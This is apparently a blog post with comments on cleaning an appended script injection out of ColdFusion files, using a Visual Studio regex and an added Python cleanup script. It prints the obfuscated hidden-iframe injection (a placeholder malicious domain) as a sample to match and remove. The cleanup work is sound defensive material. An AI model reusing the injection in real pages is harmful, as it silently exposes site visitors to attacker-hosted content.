Visual Studio as a powerful search and replace tool

Recently at work I was dealing with a server-wide compromise on a web server. A specific injection had been appended to over 2000 *.cfm files. Once I had gotten permissions in order (the root issue), I needed to figure out how to remove the injections. We have a very strong Storage Operations team and we make backups daily, however restores tend to scare customers. Since the injections were all appended and none of the legitimate data was overwritten, the injected block just needed to be removed from each file.

Open Visual Studio and press Ctrl+F, then switch the dialog from “Quick Replace” to “Replace in Files”.


The injection we want to remove for this example is as follows:

<script><!--
var applstrna0 = "<if";
var applstrna1 = "rame src=http://www.maliciousdomain";
var applstrna2 = ".com/CONTENT/faq.htm";
var applstrna3 = " width=100 height=0></i";
var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>


Notice the multiple line breaks and special characters; this is where Visual Studio regular expressions become handy.

http://msdn.microsoft.com/en-us/library/2k3te2cs(VS.80).aspx

For this situation we need to understand how to use these expressions:

Expression      Syntax   Description
Any character   .        Matches any single character except a line break.
Zero or more    *        Matches zero or more occurrences of the preceding expression, making all possible matches.
Line break      \n       Matches a platform-independent line break. In a Replace expression, inserts a line break.
Escape          \        Matches the character that follows the backslash (\) as a literal. This allows you to find the characters used in regular expression notation, such as { and ^. For example, \^ searches for the ^ character.


Here is the final search string:

\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n.*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n.*\<\/script\>

Be sure to select “Use: Regular Expressions”, then “Replace all”. If you’re on an internal network you can just use a UNC path in the “Look in:” input.

Once it completes, it reports how many occurrences were replaced and logs the result in the Find Results pane.

Replace all "\<script\>\<\!\-\-\n.*\"\<if\"\;\n.*domain\"\;\n .*faq\.htm\"\;\n.*\=0\>\<\/i\"\;\n.*frame\>\"\;\n.*applstrna4\)\;\n .*\<\/script\>", "", Regular expressions, Find Results 1, "C:\", "*.aspx"
  C:\Default.aspx(32,1):
Total replaced: 1  Matching files: 1  Total files searched: 1
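The same cleanup can be scripted when Visual Studio is not at hand, which also makes a dry run and a per-file backup easy. The following is an added example, not code from the original post: it translates the Visual Studio search string above into Python re syntax (the old VS dialect required escaping <, >, !, -, =, / and ;, Python does not), operates on raw bytes so each file's encoding and line endings are preserved, accepts both CRLF and LF line breaks, and reports the same three totals the Find Results pane shows. The sample .cfm contents and the temporary directory are constructed here for the demonstration; the function names are my own.

```python
"""Strip an appended script injection from ColdFusion (.cfm) files.

Added example: a Python counterpart of the page's Visual Studio
"Replace in Files" regex. Working on bytes keeps each file's
encoding and its CRLF/LF line endings intact.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# The page's VS search string rewritten for Python. "." never matches a
# line break (same as the VS dialect), so each ".*" stays on its own line
# and the match cannot run past the injected block. "\r?\n" accepts both
# Windows and Unix line endings.
INJECTION_RE = re.compile(
    rb'<script><!--\r?\n'
    rb'.*"<if";\r?\n'
    rb'.*domain";\r?\n'
    rb'.*faq\.htm";\r?\n'
    rb'.*=0></i";\r?\n'
    rb'.*frame>";\r?\n'
    rb'.*applstrna4\);\r?\n'
    rb'.*</script>'
)

# Constructed sample data: a small legitimate page plus the injection
# quoted in the post, using Windows CRLF line endings.
LEGIT_PAGE = b"<cfset name = 'world'>\r\n<html><body>Hello #name#</body></html>\r\n"
INJECTION = (
    b'<script><!--\r\n'
    b'var applstrna0 = "<if";\r\n'
    b'var applstrna1 = "rame src=http://www.maliciousdomain";\r\n'
    b'var applstrna2 = ".com/CONTENT/faq.htm";\r\n'
    b'var applstrna3 = " width=100 height=0></i";\r\n'
    b'var applstrna4 = "frame>";\r\n'
    b'document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);\r\n'
    b'//--></script>'
)


def strip_injection(data: bytes) -> tuple[bytes, int]:
    """Return (cleaned bytes, number of injection blocks removed)."""
    return INJECTION_RE.subn(b"", data)


def clean_tree(root: Path, glob: str = "*.cfm", dry_run: bool = True) -> dict:
    """Walk root for files matching glob and strip the injection from each.

    Returns the three totals the Find Results pane reports. With
    dry_run=True nothing is written; otherwise a .bak copy of the original
    is kept beside each rewritten file.
    """
    totals = {"total_replaced": 0, "matching_files": 0, "total_files_searched": 0}
    for path in sorted(root.rglob(glob)):
        if not path.is_file():
            continue
        totals["total_files_searched"] += 1
        original = path.read_bytes()
        cleaned, count = strip_injection(original)
        if count == 0:
            continue
        totals["matching_files"] += 1
        totals["total_replaced"] += count
        print(f"{path}: {count} injection block(s) removed")
        if not dry_run:
            path.with_name(path.name + ".bak").write_bytes(original)
            path.write_bytes(cleaned)
    return totals


def demo() -> dict:
    """Write three constructed .cfm files into a temp dir and clean them in place."""
    tmp = Path(tempfile.mkdtemp())
    (tmp / "index.cfm").write_bytes(LEGIT_PAGE + INJECTION + b"\r\n")
    (tmp / "clean.cfm").write_bytes(LEGIT_PAGE)
    (tmp / "sub").mkdir()
    # One file hit twice, as happens when an injector runs more than once.
    (tmp / "sub" / "faq.cfm").write_bytes(LEGIT_PAGE + INJECTION + b"\r\n" + INJECTION)
    return clean_tree(tmp, dry_run=False)


if __name__ == "__main__":
    print(demo())  # 3 files searched, 2 matching, 3 blocks replaced
```

Run it first with dry_run=True against the real web root to get the counts without touching anything, compare them with what the Visual Studio dialog reported, and only then rewrite. Anchoring every line of the block in the pattern, as the post's search string does, is what keeps a greedy .* from eating legitimate markup between two unrelated <script> tags.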

4 Responses

  1. Koyst Says:

    How did you stop the SQL injection?

  2. admin Says:

    SQL injection is a completely different subject. The injections I spoke of above were directly in files, not in database records. It was also file permissions related.

    Preventing SQL injection is a matter of sanitizing all GET and POST variables.

    http://en.wikipedia.org/wiki/SQL_injection#Preventing_SQL_Injection

  3. Jim Says:

    May I ask for more details about the injection itself, specifically how it happened and how you resolved it? You mentioned “getting permissions in order”. Could you elaborate? I’m asking because I have a Coldfusion site that has fallen victim to the same compromise. I can repair the damage just fine, but I’m not sure how to prevent it from happening again.

    Thanks!

  4. admin Says:

    Hello Jim,

    The root issue was web server file permissions. A certain Windows users group had full permissions recursively to all web files. One site was compromised and was used to inject files on the entire server.

    First you need to make sure your site’s file permissions are secure, depending on your host you may not be able to see the entire ACL (access control list) for your files. If that’s the case just ask them to double check to make sure no random Windows users groups have write permissions to your files.

    Second, also verify the original compromise was not an FTP compromise. Have your host check the FTP logs from the day your files were injected. If it was an FTP compromise, update your passwords and scan all workstations used to connect via FTP for viruses, loggers, sniffers, etc.

    If it wasn’t an FTP compromise have your host double check the sandbox securities in ColdFusion admin and verify that no other sites have something stupid like recursive write access to the directory where all the websites are stored.

    Assuming your site is on a Windows server, have your host set up Windows file auditing/logging for the EVERYONE group on a few of the files that got injected previously. That way if it does happen again you (well, your host) will have evidence of which Windows user wrote to the file.

    Hope that helps.
